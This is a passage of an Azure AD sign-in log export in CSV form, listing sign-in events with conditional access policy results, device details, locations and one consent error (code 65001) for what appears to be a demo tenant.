MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",40382d0f-2d62-488b-977e-6606e6131700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,40382d0f-2d62-488b-977e-6606e6131700,SigninLogs,Sucess,36.6404686,-78.26995087
+348,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:12.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,28b31186-2f82-4077-9f86-cdd1ca59e905,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:34,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",2dd0c993-4199-4428-90ff-ee601a865a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,2dd0c993-4199-4428-90ff-ee601a865a00,SigninLogs,Sucess,32.32146072,34.85319901
+349,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:22.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,06de1c89-9a20-4a2b-a2b6-0adff67ee80b,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8ccd2b23-7303-4913-b6ad-50872d291600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ccd2b23-7303-4913-b6ad-50872d291600,SigninLogs,Sucess,36.6404686,-78.26995087
+350,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6f7a7811-5cc0-4954-aeca-302db7bb1af0,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",3258d1cf-40dd-4a8d-9bcd-c61b75423b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3258d1cf-40dd-4a8d-9bcd-c61b75423b00,SigninLogs,Sucess,32.32146072,34.85319901
+351,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:50.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c23e9762-ecae-4491-948b-01668c6ecfc2,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",f1960fd9-1bc9-46c5-8a44-ddea9c421800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f1960fd9-1bc9-46c5-8a44-ddea9c421800,SigninLogs,Sucess,35.01296997,-80.93171692
+352,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:10.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc84c161-1afe-4498-949f-8b60ebb58cfe,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:04,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",085ea0cc-073f-46e3-8c51-c48646df4900,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,085ea0cc-073f-46e3-8c51-c48646df4900,SigninLogs,Sucess,32.32146072,34.85319901
+353,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:40.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fb4a9b3e-f556-431c-9d15-aa35c40c89df,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",6052c246-a70b-451d-9677-f5a730711800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6052c246-a70b-451d-9677-f5a730711800,SigninLogs,Sucess,35.01296997,-80.93171692
+354,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:21.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,65001,None,Application X doesn't have permission to access application Y or the permission has been revoked. Or The user or administrator has not consented to use the application with ID X. Send an interactive authorization request for this user and resource. Or The user or administrator has not consented to use the application with ID X. Send an authorization request to your tenant admin to act on behalf of the App : Y for Resource : Z.,0,6f7a7811-5cc0-4954-aeca-302db7bb1af0,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",28530e44-06e2-4cbf-a7c4-b32699654e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 65001, 'failureReason': ""Application X doesn't have permission to access application Y or the permission has been revoked. Or The user or administrator has not consented to use the application with ID X. Send an interactive authorization request for this user and resource. Or The user or administrator has not consented to use the application with ID X. Send an authorization request to your tenant admin to act on behalf of the App : Y for Resource : Z.""}",PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,28530e44-06e2-4cbf-a7c4-b32699654e00,SigninLogs,Failed,32.32146072,34.85319901
